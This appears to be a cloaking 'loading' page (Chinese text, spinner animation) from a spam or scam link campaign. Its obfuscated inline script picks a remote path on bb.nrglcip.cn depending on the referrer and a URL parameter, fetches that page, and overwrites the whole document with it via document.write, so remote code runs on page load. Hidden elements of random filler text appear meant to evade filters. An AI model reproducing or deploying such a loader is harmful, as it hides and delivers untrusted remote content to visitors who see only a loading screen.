<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .ugONpQ {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .ugONpQ .gdy6xG0Q30 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .ugONpQ .content {
            line-height: 50px;
            text-align: center
        }

        .ugONpQ .img {
            width: 100%
        }

        .ugONpQ .pSYzdwJXG {
            text-align: center
        }

        .ugONpQ .pSYzdwJXG span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .ugONpQ .pSYzdwJXG span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .ugONpQ .pSYzdwJXG span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .ugONpQ .pSYzdwJXG span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .ugONpQ .pSYzdwJXG span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .ugONpQ .pSYzdwJXG span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .ugONpQ .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function XXvEVoRPN42n(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var yT7FI = XXvEVoRPN42n('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ yT7FI +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ yT7FI +".html?a=share";
		}
		
        WslUcYEx9=url+"#"+new Date().getTime();
        WslUcYEx9 && function() {
            $.get(WslUcYEx9, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<a  href='#' style='display:none'>ak41R67pQbS8HUiYRbv0IF</a>
<div style='display:none'>OaeWNPSyFQaEL2C64229rDSOjKtgeJgysqm92CDXNI0AbdVzx8wV1kC64ELFQZ0XJ1W3mGcS2WTNHuOc2f1ApY8E7IFdF</div>
<p  style='display:none'>UUOB6J0Lx9l8UE9</p><div class="ugONpQ">
    <div class="gdy6xG0Q30">
        <div class="pSYzdwJXG">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<li style='display:none' >vmKgkT55jq3TJJLpz81IEDe66O6MIfCzZa8jyl</li>
<ul style='display:none' >Jvct3YMoB7t8WYQR</ul>
<p  style='display:none'>kVp5rYn5P04nKcTjmc5GW3K0r8HJ35dTS2PrT6PcTDdp66uYuWQ4ikJbsoXgtv</p>
<a  href='#' style='display:none'>EV2awCLYStKFmV2w0o5HWdwe1byXxmGS5IVATZ9TOCk9RxtCM6UWaYZA0sj2Ts</a>
<div style='display:none'>EeFqMZT2b7c2ubAIHALQmB2Dcpius0QnSj0K4OoAmSSsp6KMoCaKwncOq4wV90XWs50hIbv1fNGsaAKvuLZ9QMLtUJHg6nYIAGVx</div>
<img  src='' style='display:none'></body>
</html>